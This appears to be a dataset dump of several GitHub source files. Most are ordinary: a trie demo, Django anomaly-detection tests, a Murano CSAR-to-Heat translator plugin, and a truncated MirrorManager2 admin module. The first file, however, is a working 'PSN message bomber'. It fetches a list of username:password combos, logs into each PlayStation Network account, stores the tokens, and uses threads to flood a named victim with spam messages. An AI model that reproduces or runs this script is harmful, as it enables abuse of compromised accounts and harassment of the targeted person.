text stringlengths 4 1.02M | meta dict |
|---|---|
import requests, json, random, time, sys, pickle
from threading import Thread
from Queue import Queue
from psnlib import *
## Config
delay = 3 # Delay between messages (seconds)
comboList = "REDACTED_URL" # Userlist (page was a list of username/password combos)
threads = 2
debug = 1 # Use 1 or 0
## /Config
tokenbank = "tokenbank.p"
q = Queue()
onlyonce = False
def log(msg):
if debug:
print msg
def getTokens():
try:
tokens = pickle.load(open(tokenbank, "rb"))
except EOFError:
tokens = {}
return tokens
def removeToken(email):
tokens = getTokens()
try:
del tokens[email]
except KeyError:
pass
pickle.dump(tokens, open(tokenbank, "wb"))
def addToken(email, token):
tokens = getTokens()
tokens[email] = token
pickle.dump(tokens, open(tokenbank, "wb"))
def bomb():
global onlyonce
while not q.empty():
user = q.get()
email = user.split(":")[0]
password = user.split(":")[1]
accessToken = False
tokens = getTokens()
# Check if token exists
if email in tokens:
log("in file")
accessToken = tokens[email]
while True:
# No access token, get one and store it.
if not accessToken:
log("no token")
response = login(email, password)
# Did it succeed?
if not response or type(response) == bool:
print errors["loginfailed"]
continue
accessToken = response["access_token"]
# Add to tokenbank
addToken(email, accessToken)
log("got token")
response = getMyInfos(accessToken)
# Token is expired
if "error" in response:
removeToken(email)
log("token expired")
else:
log("token worked")
break # All succeeded :)
region = response["region"]
lang = response["language"]
from_ = response["onlineId"]
for key in psnURLS.keys():
psnURLS[key] = psnURLS[key].replace("{{lang}}", lang).replace("{{region}}", region)
# Sending messages
for i in xrange(amount):
result = sendMessage(accessToken, from_, victim, message)
if "sentMessageId" in result:
# print "Message #" + str(i + 1) + " sent."
if onlyonce == False:
print errors["messagesuccess"]
onlyonce = True
else:
# print "Couldn't send message (Victim doesn't exist?) Exiting..."
print errors["messagefailed"]
q.task_done()
sys.exit()
time.sleep(delay)
q.task_done()
# Argument parsing
if len(sys.argv) > 3:
victim = sys.argv[1]
amount = int(sys.argv[2])
message = " ".join(sys.argv[3:])
else:
print "usage: bomber.py <victim> <amount> <message>"
sys.exit()
# Main flow
try:
users = requests.get(comboList, \
headers={"User-Agent" : "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0"}).text.strip().replace("\r", "").split("\n")
except:
print "ERROR: Unable to get users list"
sys.exit()
for user in users:
q.put(user)
for i in xrange(2): # Number of threads
t = Thread(target=bomb)
t.start()
| {
"content_hash": "353eadf24398e2a60bb827aeea0c6689",
"timestamp": "",
"source": "github",
"line_count": 145,
"max_line_length": 161,
"avg_line_length": 24.048275862068966,
"alnum_prop": 0.5379982793232004,
"repo_name": "denniskupec/odds-and-ends",
"id": "d9533e12722dba833e738021d2aac3dbf2ec42e8",
"size": "3487",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "psn-message-bomber/mthread.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "PHP",
"bytes": "3605"
},
{
"name": "Python",
"bytes": "14454"
},
{
"name": "Shell",
"bytes": "3409"
}
],
"symlink_target": ""
} |
root = dict()
_end = '_end_'


def make_trie(word):
    """Insert *word* into the module-level trie and return the trie root.

    Each character becomes one nesting level; the terminal node gets an
    ``_end`` key holding the completed word in a one-element list.
    """
    node = root
    for ch in word:
        node = node.setdefault(ch, {})
    node[_end] = [word]  # terminal marker: this path spells a full word
    return root
#
def in_trie(trie, word):
    """Return True iff *word* was stored as a complete word in *trie*.

    Walks one node per character; a missing edge means the word is absent,
    and reaching the end only counts when the terminal marker is present
    (so prefixes of stored words are not matches).
    """
    node = trie
    for letter in word:
        if letter not in node:
            return False
        node = node[letter]
    return _end in node
# Demo driver: build the trie from the classic Aho-Corasick sample words
# and print each top-level subtree.
T=['he','she','his','hers']
for i in T:
    make_trie(i)
for i in root:
    print(root[i])
print(root) | {
"content_hash": "5c7f10020c47d724dea2d1a452e5e913",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 58,
"avg_line_length": 18.323529411764707,
"alnum_prop": 0.5457463884430177,
"repo_name": "vin0010/Hackerrank",
"id": "2758700bc6b1e21cd2660537bec8d6a93f210c8e",
"size": "679",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/practice/ahocorasick.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "1882"
},
{
"name": "Java",
"bytes": "10070"
},
{
"name": "Python",
"bytes": "18975"
}
],
"symlink_target": ""
} |
from django.test import TestCase
from apps.processing.ala.models import SamplingFeature, Observation
from django.contrib.gis.geos import GEOSGeometry
from apps.common.models import Process, Property
from psycopg2.extras import DateTimeTZRange
from datetime import timedelta, datetime
from apps.ad.anomaly_detection import get_timeseries
from apps.utils.time import UTC_P0100
from django.conf import settings
from apps.common.models import TimeSlots
from django.utils.dateparse import parse_datetime
from apps.mc.api.views import get_observations
from apps.mc.api.views import get_empty_slots
from functools import partial
from apps.mc.tasks import import_time_slots_from_config
# Bounds spec shared by every range below: inclusive lower, exclusive upper.
time_range_boundary = '[)'

# Main query window: 2018-06-15 10:00-13:00 (UTC+01:00).
time_from = datetime(2018, 6, 15, 10, 00, 00)
time_from = time_from.replace(tzinfo=UTC_P0100)
date_time_range = DateTimeTZRange(
    time_from,
    time_from + timedelta(hours=3),
    time_range_boundary
)

# Alternative window (used for the second station): 11:00-13:00 same day.
time_from_alternative = datetime(2018, 6, 15, 11, 00, 00)
time_from_alternative = time_from_alternative.replace(tzinfo=UTC_P0100)
date_time_range_alternative = DateTimeTZRange(
    time_from_alternative,
    time_from_alternative + timedelta(hours=2),
    time_range_boundary
)

# A 24-hour window three months later where no observations exist.
time_from_no_data = datetime(2018, 9, 15, 00, 00, 00)
time_from_no_data = time_from_no_data.replace(tzinfo=UTC_P0100)
date_time_range_no_data = DateTimeTZRange(
    time_from_no_data,
    time_from_no_data + timedelta(hours=24),
    time_range_boundary
)

# One-hour range of the first observation expected in the output series.
observation_from = datetime(2018, 6, 15, 10, 00, 00)
observation_from = observation_from.replace(tzinfo=UTC_P0100)
first_output_observation_time_range = DateTimeTZRange(
    observation_from,
    observation_from + timedelta(hours=1),
    time_range_boundary
)

# One-hour range of the last observation expected in the output series.
observation_from = datetime(2018, 6, 15, 12, 00, 00)
observation_from = observation_from.replace(tzinfo=UTC_P0100)
last_output_observation_time_range = DateTimeTZRange(
    observation_from,
    observation_from + timedelta(hours=1),
    time_range_boundary
)
def get_time_series_test(
        station_name,
        time_range,
        observed_property="air_temperature",
        observation_provider_model=Observation,
        num_time_slots=None):
    """Build the anomaly-detection time series for one station.

    Resolves the process, station and property configured for the
    'drought' topic, fetches the empty hourly slots covering *time_range*
    and delegates to :func:`get_timeseries`.

    Args:
        station_name: ``SamplingFeature.name`` to query.
        time_range: ``DateTimeTZRange`` to cover.
        observed_property: ``Property.name_id`` (default air_temperature).
        observation_provider_model: model class providing observations.
        num_time_slots: override for the slot count; defaults to the
            number of empty slots found in *time_range*.

    Returns:
        Whatever :func:`get_timeseries` returns for these inputs.
    """
    topic_config = settings.APPLICATION_MC.TOPICS['drought']
    observation_provider_model_name = f"{observation_provider_model.__module__}.{observation_provider_model.__name__}"
    prop_config = topic_config['properties'][observed_property]
    process = Process.objects.get(
        name_id=prop_config['observation_providers'][
            observation_provider_model_name]["process"])
    station = SamplingFeature.objects.get(name=station_name)
    prop = Property.objects.get(name_id=observed_property)
    # CLEANUP: the previous version also read zero/frequency/range_from/
    # range_to/name out of settings.APPLICATION_MC.TIME_SLOTS and never
    # used them; those dead locals are gone.
    # NOTE(review): the slot id below is hard-coded while the topic config
    # declares topic_config['time_slots'][0] — confirm they always match.
    t = TimeSlots.objects.get(
        name_id='1_hour_slot'
    )
    time_slots = get_empty_slots(t, time_range)
    if num_time_slots is None:
        num_time_slots = len(time_slots)
    get_observations_func = partial(
        get_observations,
        time_slots,
        prop,
        observation_provider_model,
        station,
        process,
        t
    )
    return get_timeseries(
        phenomenon_time_range=time_range,
        num_time_slots=num_time_slots,
        get_observations=get_observations_func
    )
# Running tests and examples
# all tests - ./dcmanage.sh test
# run tests in app- ./dcmanage.sh test apps.mc
# run single TestCase - ./dcmanage.sh test apps.mc.tests.TimeSeriesTestCase
# run single test - ./dcmanage.sh test apps.mc.tests.TimeSeriesTestCase.test_properties_response_status
class TimeSeriesTestCase(TestCase):
def setUp(self):
am_process = Process.objects.create(
name_id='apps.common.aggregate.arithmetic_mean',
name='arithmetic mean'
)
station = SamplingFeature.objects.create(
id_by_provider="11359201",
name="Brno",
geometry=GEOSGeometry('POINT (1847520.94 6309563.27)', srid=3857)
)
station_2 = SamplingFeature.objects.create(
id_by_provider="brno2_id_by_provider",
name="Brno2",
geometry=GEOSGeometry('POINT (1847520.94 6309563.27)', srid=3857)
)
at_prop = Property.objects.create(
name_id='air_temperature',
name='air temperature',
unit='°C',
default_mean=am_process
)
Property.objects.create(
name_id='ground_air_temperature',
name='ground air temperature',
unit='°C',
default_mean=am_process
)
import_time_slots_from_config()
t = TimeSlots.objects.get(
name_id='1_hour_slot'
)
time_from = datetime(2018, 6, 15, 11, 00, 00)
time_from = time_from.replace(tzinfo=UTC_P0100)
Observation.objects.create(
observed_property=at_prop,
feature_of_interest=station_2,
procedure=am_process,
result=1.5,
time_slots=t,
phenomenon_time_range=DateTimeTZRange(
time_from,
time_from + timedelta(hours=1),
time_range_boundary
)
)
time_from = datetime(2018, 6, 15, 12, 00, 00)
time_from = time_from.replace(tzinfo=UTC_P0100)
Observation.objects.create(
observed_property=at_prop,
feature_of_interest=station_2,
procedure=am_process,
result=1.5,
time_slots=t,
phenomenon_time_range=DateTimeTZRange(
time_from,
time_from + timedelta(hours=1),
time_range_boundary
)
)
time_from = datetime(2018, 6, 14, 13, 00, 00)
time_from = time_from.replace(tzinfo=UTC_P0100)
Observation.objects.create(
observed_property=at_prop,
feature_of_interest=station,
procedure=am_process,
result=1.5,
time_slots=t,
phenomenon_time_range=DateTimeTZRange(
time_from,
time_from + timedelta(hours=1),
time_range_boundary
)
)
Observation.objects.create(
observed_property=at_prop,
feature_of_interest=station,
procedure=am_process,
result=1,
time_slots=t,
phenomenon_time_range=first_output_observation_time_range
)
time_from = datetime(2018, 6, 15, 11, 00, 00)
time_from = time_from.replace(tzinfo=UTC_P0100)
Observation.objects.create(
observed_property=at_prop,
feature_of_interest=station,
procedure=am_process,
result=1000,
time_slots=t,
phenomenon_time_range=DateTimeTZRange(
time_from,
time_from + timedelta(hours=1),
time_range_boundary
)
)
Observation.objects.create(
observed_property=at_prop,
feature_of_interest=station,
procedure=am_process,
result=1.5,
time_slots=t,
phenomenon_time_range=last_output_observation_time_range
)
time_from = datetime(2018, 6, 16, 13, 00, 00)
Observation.objects.create(
observed_property=at_prop,
feature_of_interest=station,
procedure=am_process,
result=1.5,
time_slots=t,
phenomenon_time_range=DateTimeTZRange(
time_from,
time_from + timedelta(hours=1),
time_range_boundary
)
)
    def test_create_process(self):
        """setUp created at least one Process."""
        process = Process.objects.all()
        self.assertGreater(len(process), 0)

    def test_create_property(self):
        """setUp created at least one Property."""
        property = Property.objects.all()
        self.assertGreater(len(property), 0)

    def test_create_observation(self):
        """setUp created at least one Observation."""
        observation = Observation.objects.all()
        self.assertGreater(len(observation), 0)

    def test_create_station(self):
        """The 'Brno' sampling feature is retrievable by name."""
        station = SamplingFeature.objects.get(name="Brno")
        self.assertEqual(station.name, 'Brno')

    def test_property_values(self):
        """Brno's 10:00-13:00 window yields the three fixture results."""
        ts = get_time_series_test('Brno', date_time_range)
        self.assertEqual(ts['property_values'], [1.000, 1000.000, 1.500])

    def test_empty_property_values(self):
        """Requesting zero slots produces empty value/anomaly lists."""
        ts = get_time_series_test('Brno', date_time_range_no_data, num_time_slots=0)
        self.assertEqual(len(ts['property_values']), 0)
        self.assertEqual(len(ts['property_anomaly_rates']), 0)

    def test_null_property_values(self):
        """Slots with no observations come back as None values."""
        ts = get_time_series_test('Brno', date_time_range_no_data, num_time_slots=2)
        self.assertEqual(len(ts['property_values']), 2)
        self.assertEqual(len(ts['property_anomaly_rates']), 2)
        self.assertEqual(ts['property_values'], [None, None])

    def test_count(self):
        """Three hourly slots fall inside the 10:00-13:00 window."""
        ts = get_time_series_test('Brno', date_time_range)
        self.assertEqual(len(ts['property_values']), 3)

    def test_property_values_count_equal_anomaly_rates_count(self):
        """Values and anomaly rates are parallel lists of equal length."""
        ts = get_time_series_test('Brno', date_time_range)
        self.assertEqual(len(ts['property_values']), len(ts['property_anomaly_rates']))

    def test_out_bounds(self):
        """The returned range is closed-open: [lower, upper)."""
        ts = get_time_series_test('Brno', date_time_range)
        lower_inc = ts['phenomenon_time_range'].lower_inc
        upper_inc = ts['phenomenon_time_range'].upper_inc
        self.assertTrue(lower_inc)
        self.assertFalse(upper_inc)

    def test_time_range_in_contains_out(self):
        """The output range never extends beyond the requested range."""
        ts = get_time_series_test('Brno', date_time_range)
        out_lower = ts['phenomenon_time_range'].lower
        out_upper = ts['phenomenon_time_range'].upper
        self.assertTrue(out_lower >= date_time_range.lower)
        self.assertTrue(out_upper <= date_time_range.upper)

    def test_in_bounds(self):
        """The requested range itself is closed-open."""
        ts = get_time_series_test('Brno', date_time_range)
        lower_inc = date_time_range.lower_inc
        upper_inc = date_time_range.upper_inc
        self.assertTrue(lower_inc)
        self.assertFalse(upper_inc)

    def test_alternative_feature(self):
        """Brno2's 11:00-13:00 window yields its two fixture results."""
        ts = get_time_series_test('Brno2', date_time_range_alternative)
        self.assertEqual(ts['property_values'], [1.500, 1.500])
| {
"content_hash": "9bc7c0f1cab86d3888a48993dcfbf7ea",
"timestamp": "",
"source": "github",
"line_count": 312,
"max_line_length": 118,
"avg_line_length": 33.95192307692308,
"alnum_prop": 0.6225809496837534,
"repo_name": "gis4dis/poster",
"id": "6e6ab9520e26b74e9fbb85a3af34b24de10893a1",
"size": "10595",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/ad/tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "782"
},
{
"name": "Dockerfile",
"bytes": "586"
},
{
"name": "HTML",
"bytes": "12793"
},
{
"name": "Jupyter Notebook",
"bytes": "23402"
},
{
"name": "Makefile",
"bytes": "1178"
},
{
"name": "Python",
"bytes": "493523"
},
{
"name": "Shell",
"bytes": "1729"
}
],
"symlink_target": ""
} |
import os
import shutil
import six
import sys
import yaml
import zipfile
from murano.packages import exceptions
from murano.packages import package_base
from toscaparser.common import exception as csar_exception
from toscaparser.prereq import csar
from toscaparser.tosca_template import ToscaTemplate
from translator.hot.tosca_translator import TOSCATranslator
CSAR_RESOURCES_DIR_NAME = 'Resources/'
CSAR_FILES_DIR_NAME = 'CSARFiles/'
CSAR_ENV_DIR_NAME = 'CSAREnvironments/'
class YAQL(object):
    """Marker wrapping a raw YAQL expression string.

    Instances are recognised by the custom representer below so the
    expression is emitted as a '!yaql'-tagged scalar when dumped to YAML.
    """
    def __init__(self, expr):
        self.expr = expr
class Dumper(yaml.SafeDumper):
    """SafeDumper subclass so custom representers registered here do not
    leak into the shared yaml.SafeDumper class."""
    pass
def yaql_representer(dumper, data):
    """Represent a YAQL wrapper as a '!yaql'-tagged scalar node."""
    return dumper.represent_scalar(u'!yaql', data.expr)
# Register once at import time: every YAQL instance dumped through Dumper
# is rendered via yaql_representer.
Dumper.add_representer(YAQL, yaql_representer)
class CSARPackage(package_base.PackageBase):
    def __init__(self, format_name, runtime_version, source_directory,
                 manifest):
        """Initialise the package; translation results are computed lazily."""
        super(CSARPackage, self).__init__(
            format_name, runtime_version, source_directory, manifest)
        self._translated_class = None  # cached MuranoPL class YAML
        self._source_directory = source_directory
        self._translated_ui = None  # cached UI definition YAML

    @property
    def classes(self):
        # The package exposes exactly one class, named after the package.
        return self.full_name,

    @property
    def requirements(self):
        # CSAR packages declare no package-level requirements.
        return {}

    @property
    def ui(self):
        # Translate the UI definition on first access, then cache it.
        if not self._translated_ui:
            self._translated_ui = self._translate_ui()
        return self._translated_ui

    def get_class(self, name):
        """Return (class source, filename hint) for *name*.

        Raises PackageClassLoadError when *name* is not this package's
        single class. Translation happens on first call and is cached.
        """
        if name != self.full_name:
            raise exceptions.PackageClassLoadError(
                name, 'Class not defined in this package')
        if not self._translated_class:
            self._translate_class()
        return self._translated_class, '<generated code>'
def _translate_class(self):
csar_file = os.path.join(self._source_directory, 'csar.zip')
shutil.copy(csar_file, self.get_resource(self.full_name))
if not os.path.isfile(csar_file):
raise exceptions.PackageClassLoadError(
self.full_name, 'File with class definition not found')
csar_obj = csar.CSAR(csar_file)
try:
csar_obj.validate()
except csar_exception.ValidationError as ve:
raise exceptions.PackageFormatError('Not a CSAR archive: ' +
str(ve))
translated = {
'Name': self.full_name,
'Extends': 'io.murano.Application'
}
csar_envs_path = os.path.join(self._source_directory,
CSAR_RESOURCES_DIR_NAME,
CSAR_ENV_DIR_NAME)
validate_csar_parameters = (not os.path.isdir(csar_envs_path) or
not os.listdir(csar_envs_path))
tosca = csar_obj.get_main_template_yaml()
parameters = CSARPackage._build_properties(tosca,
validate_csar_parameters)
parameters.update(CSARPackage._translate_outputs(tosca))
translated['Properties'] = parameters
hot = yaml.load(self._translate('tosca', csar_obj.csar,
parameters, True))
files = CSARPackage._translate_files(self._source_directory)
template_file = os.path.join(self._source_directory,
CSAR_RESOURCES_DIR_NAME, 'template.yaml')
with open(template_file, 'w') as outfile:
outfile.write(yaml.safe_dump(hot))
translated.update(CSARPackage._generate_workflow(hot, files))
self._translated_class = yaml.dump(translated, Dumper=Dumper,
default_style='"')
def _translate(self, sourcetype, path, parsed_params, a_file):
output = None
if sourcetype == "tosca":
tosca = ToscaTemplate(path, parsed_params, a_file)
translator = TOSCATranslator(tosca, parsed_params)
output = translator.translate()
return output
@staticmethod
def _build_properties(csar, csar_parameters):
result = {
'generatedHeatStackName': {
'Contract': YAQL('$.string()'),
'Usage': 'Out'
},
'hotEnvironment': {
'Contract': YAQL('$.string()'),
'Usage': 'In'
}
}
if csar_parameters:
params_dict = {}
for key, value in (csar.get('parameters') or {}).items():
param_contract = \
CSARPackage._translate_param_to_contract(value)
params_dict[key] = param_contract
result['templateParameters'] = {
'Contract': params_dict,
'Default': {},
'Usage': 'In'
}
else:
result['templateParameters'] = {
'Contract': {},
'Default': {},
'Usage': 'In'
}
return result
@staticmethod
def _translate_param_to_contract(value):
contract = '$'
parameter_type = value['type']
if parameter_type in ('string', 'comma_delimited_list', 'json'):
contract += '.string()'
elif parameter_type == 'integer':
contract += '.int()'
elif parameter_type == 'boolean':
contract += '.bool()'
else:
raise ValueError('Unsupported parameter type ' + parameter_type)
constraints = value.get('constraints') or []
for constraint in constraints:
translated = CSARPackage._translate_constraint(constraint)
if translated:
contract += translated
result = YAQL(contract)
return result
@staticmethod
def _translate_outputs(csar):
result = {}
for key in (csar.get('outputs') or {}).keys():
result[key] = {
"Contract": YAQL("$.string()"),
"Usage": "Out"
}
return result
    @staticmethod
    def _translate_files(source_directory):
        """Extract csar.zip into Resources/CSARFiles/ and list its files.

        Returns the relative paths of everything extracted, as produced by
        _build_csar_resources.
        """
        source = os.path.join(source_directory, 'csar.zip')
        dest_dir = os.path.join(source_directory, CSAR_RESOURCES_DIR_NAME,
                                CSAR_FILES_DIR_NAME)
        with zipfile.ZipFile(source, "r") as z:
            z.extractall(dest_dir)
        csar_files_path = os.path.join(source_directory,
                                       CSAR_RESOURCES_DIR_NAME,
                                       CSAR_FILES_DIR_NAME)
        return CSARPackage._build_csar_resources(csar_files_path)
@staticmethod
def _build_csar_resources(basedir):
result = []
if os.path.isdir(basedir):
for root, _, files in os.walk(os.path.abspath(basedir)):
for f in files:
full_path = os.path.join(root, f)
relative_path = os.path.relpath(full_path, basedir)
result.append(relative_path)
return result
@staticmethod
def _translate_constraint(constraint):
if 'equal' in constraint:
return CSARPackage._translate_equal_constraint(
constraint['equal'])
elif 'valid_values' in constraint:
return CSARPackage._translate_valid_values_constraint(
constraint['valid_values'])
elif 'length' in constraint:
return CSARPackage._translate_length_constraint(
constraint['length'])
elif 'in_range' in constraint:
return CSARPackage._translate_range_constraint(
constraint['in_range'])
elif 'allowed_pattern' in constraint:
return CSARPackage._translate_allowed_pattern_constraint(
constraint['allowed_pattern'])
    @staticmethod
    def _translate_equal_constraint(value):
        # YAQL: assert the value equals the given constant.
        return ".check($ == {0})".format(value)

    @staticmethod
    def _translate_allowed_pattern_constraint(value):
        # YAQL: assert the value matches the given regular expression.
        return ".check(matches($, '{0}'))".format(value)

    @staticmethod
    def _translate_valid_values_constraint(values):
        # YAQL: assert the value is one of the allowed literals.
        return '.check($ in list({0}))'.format(
            ', '.join([CSARPackage._format_value(v) for v in values]))

    @staticmethod
    def _translate_length_constraint(value):
        # YAQL: bound the value's length. Returns None (no clause) when
        # neither 'min' nor 'max' is present.
        if 'min' in value and 'max' in value:
            return '.check(len($) >= {0} and len($) <= {1})'.format(
                int(value['min']), int(value['max']))
        elif 'min' in value:
            return '.check(len($) >= {0})'.format(int(value['min']))
        elif 'max' in value:
            return '.check(len($) <= {0})'.format(int(value['max']))

    @staticmethod
    def _translate_range_constraint(value):
        # YAQL: bound the value itself. Returns None (no clause) when
        # neither 'min' nor 'max' is present.
        if 'min' in value and 'max' in value:
            return '.check($ >= {0} and $ <= {1})'.format(
                int(value['min']), int(value['max']))
        elif 'min' in value:
            return '.check($ >= {0})'.format(int(value['min']))
        elif 'max' in value:
            return '.check($ <= {0})'.format(int(value['max']))
    @staticmethod
    def _format_value(value):
        # Render a constraint literal for embedding in a YAQL list(...).
        # NOTE(review): string values are emitted unquoted here — confirm
        # YAQL list literals accept bare words; otherwise quoting is needed.
        if isinstance(value, six.string_types):
            return u"{}".format(value)
        return six.text_type(value)
@staticmethod
def _generate_workflow(csar, files):
hot_files_map = {}
for f in files:
file_path = "$resources.string('{0}{1}')".format(
CSAR_FILES_DIR_NAME, f)
hot_files_map['../{0}'.format(f)] = YAQL(file_path)
hot_env = YAQL("$.hotEnvironment")
copy_outputs = []
for key in (csar.get('outputs') or {}).keys():
copy_outputs.append({YAQL('$.' + key): YAQL('$outputs.' + key)})
deploy = [
{YAQL('$environment'): YAQL(
"$.find('io.murano.Environment').require()"
)},
{YAQL('$reporter'): YAQL(
"new('io.murano.system.StatusReporter', "
"environment => $environment)")},
{
'If': YAQL('$.getAttr(generatedHeatStackName) = null'),
'Then': [
YAQL("$.setAttr(generatedHeatStackName, "
"'{0}_{1}'.format(randomName(), id($environment)))")
]
},
{YAQL('$stack'): YAQL(
"new('io.murano.system.HeatStack', $environment, "
"name => $.getAttr(generatedHeatStackName))")},
YAQL("$reporter.report($this, "
"'Application deployment has started')"),
{YAQL('$resources'): YAQL("new('io.murano.system.Resources')")},
{YAQL('$template'): YAQL("$resources.yaml('template.yaml')")},
YAQL('$stack.setTemplate($template)'),
{YAQL('$parameters'): YAQL("$.templateParameters")},
YAQL('$stack.setParameters($parameters)'),
{YAQL('$files'): hot_files_map},
YAQL('$stack.setFiles($files)'),
{YAQL('$hotEnv'): hot_env},
{
'If': YAQL("bool($hotEnv)"),
'Then': [
{YAQL('$envRelPath'): YAQL("'{0}' + $hotEnv".format(
CSAR_ENV_DIR_NAME))},
{YAQL('$hotEnvContent'): YAQL("$resources.string("
"$envRelPath)")},
YAQL('$stack.setHotEnvironment($hotEnvContent)')
]
},
YAQL("$reporter.report($this, 'Stack creation has started')"),
{
'Try': [YAQL('$stack.push()')],
'Catch': [
{
'As': 'e',
'Do': [
YAQL("$reporter.report_error($this, $e.message)"),
{'Rethrow': None}
]
}
],
'Else': [
{YAQL('$outputs'): YAQL('$stack.output()')},
{'Do': copy_outputs},
YAQL("$reporter.report($this, "
"'Stack was successfully created')"),
YAQL("$reporter.report($this, "
"'Application deployment has finished')"),
]
}
]
destroy = [
{YAQL('$environment'): YAQL(
"$.find('io.murano.Environment').require()"
)},
{YAQL('$stack'): YAQL(
"new('io.murano.system.HeatStack', $environment, "
"name => $.getAttr(generatedHeatStackName))")},
YAQL('$stack.delete()')
]
return {
'Workflow': {
'deploy': {
'Body': deploy
},
'destroy': {
'Body': destroy
}
}
}
@staticmethod
def _translate_ui_parameters(tosca, title):
result_groups = []
used_inputs = set()
tosca_inputs = tosca.get('topology_template').get('inputs') or {}
fields = []
properties = []
for input in tosca_inputs:
input_value = tosca_inputs.get(input)
if input_value:
fields.append(CSARPackage._translate_ui_parameter(
input, input_value))
used_inputs.add(input)
properties.append(input)
if fields or properties:
result_groups.append((fields, properties))
rest_group = []
properties = []
for key, value in six.iteritems(tosca_inputs):
if key not in used_inputs:
rest_group.append(CSARPackage._translate_ui_parameter(
key, value))
properties.append(key)
if rest_group:
result_groups.append((rest_group, properties))
return result_groups
@staticmethod
def _translate_ui_parameter(name, parameter_spec):
translated = {
'name': name,
'label': name.title().replace('_', ' ')
}
parameter_type = parameter_spec['type']
if parameter_type == 'integer':
translated['type'] = 'integer'
elif parameter_type == 'boolean':
translated['type'] = 'boolean'
else:
# string, json, and comma_delimited_list parameters are all
# displayed as strings in UI. Any unsupported parameter would also
# be displayed as strings.
translated['type'] = 'string'
label = parameter_spec.get('label')
if label:
translated['label'] = label
if 'description' in parameter_spec:
translated['description'] = parameter_spec['description']
if 'default' in parameter_spec:
translated['initial'] = parameter_spec['default']
translated['required'] = False
else:
translated['required'] = True
constraints = parameter_spec.get('constraints') or []
translated_constraints = []
for constraint in constraints:
if 'length' in constraint:
spec = constraint['length']
if 'min' in spec:
translated['minLength'] = max(
translated.get('minLength', -sys.maxint - 1),
int(spec['min']))
if 'max' in spec:
translated['maxLength'] = min(
translated.get('maxLength', sys.maxint),
int(spec['max']))
elif 'range' in constraint:
spec = constraint['range']
if 'min' in spec and 'max' in spec:
ui_constraint = {
'expr': YAQL('$ >= {0} and $ <= {1}'.format(
spec['min'], spec['max']))
}
elif 'min' in spec:
ui_constraint = {
'expr': YAQL('$ >= {0}'.format(spec['min']))
}
else:
ui_constraint = {
'expr': YAQL('$ <= {0}'.format(spec['max']))
}
if 'description' in constraint:
ui_constraint['message'] = constraint['description']
translated_constraints.append(ui_constraint)
elif 'valid_values' in constraint:
values = constraint['valid_values']
ui_constraint = {
'expr': YAQL('$ in list({0})'.format(', '.join(
[CSARPackage._format_value(v) for v in values])))
}
if 'description' in constraint:
ui_constraint['message'] = constraint['description']
translated_constraints.append(ui_constraint)
elif 'allowed_pattern' in constraint:
pattern = constraint['allowed_pattern']
ui_constraint = {
'expr': {
'regexpValidator': pattern
}
}
if 'description' in constraint:
ui_constraint['message'] = constraint['description']
translated_constraints.append(ui_constraint)
if translated_constraints:
translated['validators'] = translated_constraints
return translated
@staticmethod
def _generate_application_ui(groups, type_name, package_name=None,
package_version=None):
app = {
'?': {
'type': type_name
}
}
if package_name:
app['?']['package'] = package_name
if package_version:
app['?']['classVersion'] = package_version
for i, record in enumerate(groups):
section = app.setdefault('templateParameters', {})
for property_name in record[1]:
section[property_name] = YAQL(
'$.group{0}.{1}'.format(i, property_name))
return app
def _translate_ui(self):
tosca = csar.CSAR(os.path.join(self._source_directory, 'csar.zip'))\
.get_main_template_yaml()
groups = CSARPackage._translate_ui_parameters(tosca, self.description)
forms = []
for i, record in enumerate(groups):
forms.append({'group{0}'.format(i): {'fields': record[0]}})
translated = {
'Version': 2.2,
'Application': CSARPackage._generate_application_ui(
groups, self.full_name, self.full_name, str(self.version)),
'Forms': forms
}
return yaml.dump(translated, Dumper=Dumper, default_style='"')
| {
"content_hash": "dec7c043389e8f15613df9aa5f3c5f7d",
"timestamp": "",
"source": "github",
"line_count": 524,
"max_line_length": 78,
"avg_line_length": 35.912213740458014,
"alnum_prop": 0.5078648102880221,
"repo_name": "DavidPurcell/murano_temp",
"id": "696bc1802b0361964449bf5c40e4a16d3586585f",
"size": "19391",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "contrib/plugins/murano_heat-translator_plugin/plugin/csar_package.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "304"
},
{
"name": "Mako",
"bytes": "2026"
},
{
"name": "PowerShell",
"bytes": "2966"
},
{
"name": "Puppet",
"bytes": "86"
},
{
"name": "Python",
"bytes": "1758483"
},
{
"name": "Ruby",
"bytes": "444"
},
{
"name": "Shell",
"bytes": "34202"
}
],
"symlink_target": ""
} |
'''
MirrorManager2 admin flask controller.
'''
import flask
from flask.ext.admin import BaseView, expose
try:
from flask.ext.admin.contrib.sqla import ModelView
except ImportError: # pragma: no cover
# The module was renamed in flask-admin
from flask.ext.admin.contrib.sqlamodel import ModelView
from mirrormanager2.app import APP, ADMIN, SESSION, is_mirrormanager_admin
from mirrormanager2.lib import model
class MMModelView(ModelView):
    ''' Base class for the Mirrormanager preventing access to the admin
    interface to non-admin.
    '''

    def is_accessible(self):
        ''' Prevent access to non-admin user.

        Returns True only when a FAS user is logged in and
        is_mirrormanager_admin() recognises them as an admin; flask-admin
        hides the view from everyone else.
        '''
        admin = False
        if hasattr(flask.g, 'fas_user') and flask.g.fas_user:
            admin = is_mirrormanager_admin(flask.g.fas_user)
        return admin
class DirectoryView(MMModelView):
    ''' View of the Directory tables specifying which fields of the table
    should be shown (and their order).
    '''

    # Override displayed fields: only these three columns appear in the
    # admin list view.
    column_list = ('name', 'readable', 'ctime')
VIEWS = [
MMModelView(model.Arch, SESSION),
MMModelView(model.Category, SESSION),
MMModelView(model.Country, SESSION, category='Country'),
MMModelView(model.CountryContinentRedirect, SESSION, category='Country'),
MMModelView(model.EmbargoedCountry, SESSION, category='Country'),
DirectoryView(model.Directory, SESSION, category='Directory'),
DirectoryView(model.DirectoryExclusiveHost, SESSION, category='Directory'),
MMModelView(model.FileDetail, SESSION, category='File'),
